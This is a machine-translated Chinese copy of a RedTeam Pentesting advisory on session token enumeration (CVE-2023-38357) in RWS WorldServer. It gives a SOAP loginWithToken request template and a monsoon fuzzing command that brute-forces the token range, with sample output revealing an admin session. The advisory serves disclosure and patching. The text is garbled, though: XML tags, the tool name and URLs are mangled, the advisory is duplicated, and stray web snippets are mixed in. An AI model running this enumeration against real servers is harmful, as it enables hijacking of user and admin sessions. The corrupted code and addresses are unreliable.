利用标题: RWS WorldServer 11.7.3-会话令牌枚举
RWS WorldServer的会话令牌的熵较低,可以是
枚举,导致未经授权访问用户会话。
细节
========
Product: WorldServer
受影响的版本: 11.7.3及更早版本
固定版本: 11.8.0
漏洞类型:会话令牌枚举
安全风险:高
供应商URL: https://www.rw.rws.com/LOCALIAMIZER/PRODUCTS/ADDITIONAL-SOLUTIONS/
供应商状态:固定版本已发布
Advisory URL: https://www.redteam-penting.de/ADVISOIRES/RT-SA-SA-2023-001
咨询状态:发布
CVE: CVE-2023-38357
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-38357
介绍
===============
'WorldServer提供灵活的企业级翻译管理
自动化翻译任务并大大降低成本的系统
支持大量当地语言内容。
(来自供应商的主页)
更多细节
===============
WorldServer将用户会话与数值令牌合作,这总是
低于2^31的正值。肥皂动作“登录”允许
对于大量的并行尝试检查令牌是否有效。
在分析过程中,发现许多分配的令牌在7位中
值范围。因此,攻击者能够枚举用户
仅几个小时内就有帐户。
概念证明
=====================
在以下示例中,显示了“登录WithToken”请求:
-------------------------------------------------------------------------------------------------------------------
POST/WS/SERVICE/WSCONTEXT HTTP/1.1
content-type: text/xml; charset=utf-8
肥皂:''
内容长度: 501
HOST: www.example.com
连接:关闭
用户代理:代理
SOAPENV:ENVELOPE XMLNS:XSI='3http://www.w3.org/2001/XMLSCHEMA-INSTANCE'XMLNS:XSD='3http://WWW.W.W.ORG/XMLSCHEMA
xmlns:soapenv='http://schemas.xmlsoap.org'
SOAPENV:HEADER/
SOAPENV:体
com3360loginwithtoken soapenv:encodingStyle='3http://schemas.xmlsoap.org/soap/engoding/'
令牌XSI:TYPE='XSD:STRING'FUZZ/令牌
/com:loginwithtoken
/soapenv:体
/soapenv:envelope
-------------------------------------------------------------------------------------------------------------------
它可以保存为文件“ login-soap.req”,并用作请求
命令行HTTP枚举季风[1]的模板
许多并行请求:
-------------------------------------------------------------------------------------------------------------------
$季风Fuzz -Threads 100 \
-template-file login-soap.req \
目标url: https://www.example.com/
状态标头体价值提取
500 191 560 5829099
500 191 556 6229259
200 191 3702 7545136
500 191 556 9054984
[.]
2H38M38S中处理的120000 HTTP请求
120000个请求中的4个,1225 REQ/S
-------------------------------------------------------------------------------------------------------------------
- 范围参数反映了2^31的可能值范围,并且
每个值都将HTTP请求发送到WorldServer肥皂API
请求模板中的模糊标记被相对替换
价值。响应也是隐藏的,其中包含“无效的Exception”
由于这些会话无效。响应将产生200个状态代码
如果找到管理会议令牌。对于一个无私的用户
会话,状态代码500。
解决方法
=============
降低可以发出请求的利率,例如
前端代理。
使固定
===
根据供应商的说法,升级到11.8.0以上的版本可以解决
脆弱性。
安全风险
=================
攻击者可以有效地枚举会话令牌。穿透
测试,可以访问多个用户帐户,包括
在三个小时内使用此方法的行政帐户。
此外,通过使用这样的管理帐户
可以通过在基础服务器上执行任意代码
自定义REST API [2]。因此,脆弱性带来了高风险。
时间表
==========
已确定的2023-03-27漏洞
2023-03-30客户批准向供应商披露
2023-04-03请求供应商的安全联系
2023-04-06供应商以安全联系方式做出了回应
2023-04-14发送给供应商的咨询
2023-04-18供应商确认漏洞,并指出它已经是
已知和固定在版本11.8.0中。
2023-07-03客户确认对固定版本的更新
2023-07-05请求CVE ID
2023-07-15分配了CVE ID
2023-07-19咨询发布
参考
=============
[1] https://github.com/redteampentesting/monsoon
[2] https://docs.rws.com/860026/585715/...er-documentation/customizing-the-the-rest-api
redteam pentesting GmbH
================================
Redteam Pentesting提供了由A执行的个人穿透测试
专业IT安全专家团队。特此,安全弱点
公司网络或产品被发现,可以立即修复。
由于该领域只有很少的专家,因此Redteam Pentesting想要
分享其知识并通过研究来增强公众知识
与安全有关的区域。结果可作为公开
安全咨询。
可以在:中找到有关Redteam Pentesting的更多信息
www.redteam-pentesting.de
在Redteam Pentesting工作
=======================================
Redteam Pentesting正在寻找渗透测试人员加入我们的团队
在德国亚兴。如果您有兴趣,请访问:
jobs.redteam-pentesting.de
- -
redteam Pentesting GmbH Tel. +49 241 510081-0
Alter Pasthof 1传真: +49 241 510081-99
52062 AACHEN https://www.redteam-pesting.de
德国registergericht: Aachen HRB 14004
Geschäftsführer
atrick Hof,Jens Liebchen
RWS WorldServer的会话令牌的熵较低,可以是
枚举,导致未经授权访问用户会话。
细节
========
Product: WorldServer
受影响的版本: 11.7.3及更早版本
固定版本: 11.8.0
漏洞类型:会话令牌枚举
安全风险:高
供应商URL: https://www.rw.rws.com/LOCALIAMIZER/PRODUCTS/ADDITIONAL-SOLUTIONS/
供应商状态:固定版本已发布
Advisory URL: https://www.redteam-penting.de/ADVISOIRES/RT-SA-SA-2023-001
咨询状态:发布
CVE: CVE-2023-38357
cve url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-38357
介绍
===============
'WorldServer提供灵活的企业级翻译管理
自动化翻译任务并大大降低成本的系统
支持大量当地语言内容。
(来自供应商的主页)
更多细节
===============
WorldServer将用户会话与数值令牌合作,这总是
低于2^31的正值。肥皂动作“登录”允许
对于大量的并行尝试检查令牌是否有效。
在分析过程中,发现许多分配的令牌在7位中
值范围。因此,攻击者能够枚举用户
仅几个小时内就有帐户。
概念证明
=====================
在以下示例中,显示了“登录WithToken”请求:
-------------------------------------------------------------------------------------------------------------------
POST/WS/SERVICE/WSCONTEXT HTTP/1.1
content-type: text/xml; charset=utf-8
肥皂:''
内容长度: 501
HOST: www.example.com
连接:关闭
用户代理:代理
SOAPENV:ENVELOPE XMLNS:XSI='3http://www.w3.org/2001/XMLSCHEMA-INSTANCE'XMLNS:XSD='3http://WWW.W.W.ORG/XMLSCHEMA
xmlns:soapenv='http://schemas.xmlsoap.org'
SOAPENV:HEADER/
SOAPENV:体
com3360loginwithtoken soapenv:encodingStyle='3http://schemas.xmlsoap.org/soap/engoding/'
令牌XSI:TYPE='XSD:STRING'FUZZ/令牌
/com:loginwithtoken
/soapenv:体
/soapenv:envelope
-------------------------------------------------------------------------------------------------------------------
它可以保存为文件“ login-soap.req”,并用作请求
命令行HTTP枚举季风[1]的模板
许多并行请求:
-------------------------------------------------------------------------------------------------------------------
$季风Fuzz -Threads 100 \
-template-file login-soap.req \
- 范围1-2147483647 \
- 隐藏式'无效Exception'\
目标url: https://www.example.com/
状态标头体价值提取
500 191 560 5829099
500 191 556 6229259
200 191 3702 7545136
500 191 556 9054984
[.]
2H38M38S中处理的120000 HTTP请求
120000个请求中的4个,1225 REQ/S
-------------------------------------------------------------------------------------------------------------------
- 范围参数反映了2^31的可能值范围,并且
每个值都将HTTP请求发送到WorldServer肥皂API
请求模板中的模糊标记被相对替换
价值。响应也是隐藏的,其中包含“无效的Exception”
由于这些会话无效。响应将产生200个状态代码
如果找到管理会议令牌。对于一个无私的用户
会话,状态代码500。
解决方法
=============
降低可以发出请求的利率,例如
前端代理。
使固定
===
根据供应商的说法,升级到11.8.0以上的版本可以解决
脆弱性。
安全风险
=================
攻击者可以有效地枚举会话令牌。穿透
测试,可以访问多个用户帐户,包括
在三个小时内使用此方法的行政帐户。
此外,通过使用这样的管理帐户
可以通过在基础服务器上执行任意代码
自定义REST API [2]。因此,脆弱性带来了高风险。
时间表
==========
已确定的2023-03-27漏洞
2023-03-30客户批准向供应商披露
2023-04-03请求供应商的安全联系
2023-04-06供应商以安全联系方式做出了回应
2023-04-14发送给供应商的咨询
2023-04-18供应商确认漏洞,并指出它已经是
已知和固定在版本11.8.0中。
2023-07-03客户确认对固定版本的更新
2023-07-05请求CVE ID
2023-07-15分配了CVE ID
2023-07-19咨询发布
参考
=============
[1] https://github.com/redteampentesting/monsoon
[2] https://docs.rws.com/860026/585715/...er-documentation/customizing-the-the-rest-api
redteam pentesting GmbH
================================
Redteam Pentesting提供了由A执行的个人穿透测试
专业IT安全专家团队。特此,安全弱点
公司网络或产品被发现,可以立即修复。
由于该领域只有很少的专家,因此Redteam Pentesting想要
分享其知识并通过研究来增强公众知识
与安全有关的区域。结果可作为公开
安全咨询。
可以在:中找到有关Redteam Pentesting的更多信息
RedTeam Pentesting GmbH - Home
RedTeam Pentesting is specialised in performing penetration tests. Mandated by worldwide customers, security vulnerabilities in IT systems are uncovered.
www.redteam-pentesting.de
=======================================
Redteam Pentesting正在寻找渗透测试人员加入我们的团队
在德国亚兴。如果您有兴趣,请访问:
Werde eine*r von uns!
Interesse an einer Anstellung als Penetrationstester*in? Bewirb dich jetzt bei RedTeam Pentesting!
jobs.redteam-pentesting.de
redteam Pentesting GmbH Tel. +49 241 510081-0
Alter Pasthof 1传真: +49 241 510081-99
52062 AACHEN https://www.redteam-pesting.de
德国registergericht: Aachen HRB 14004
Geschäftsführer
atrick Hof,Jens Liebchen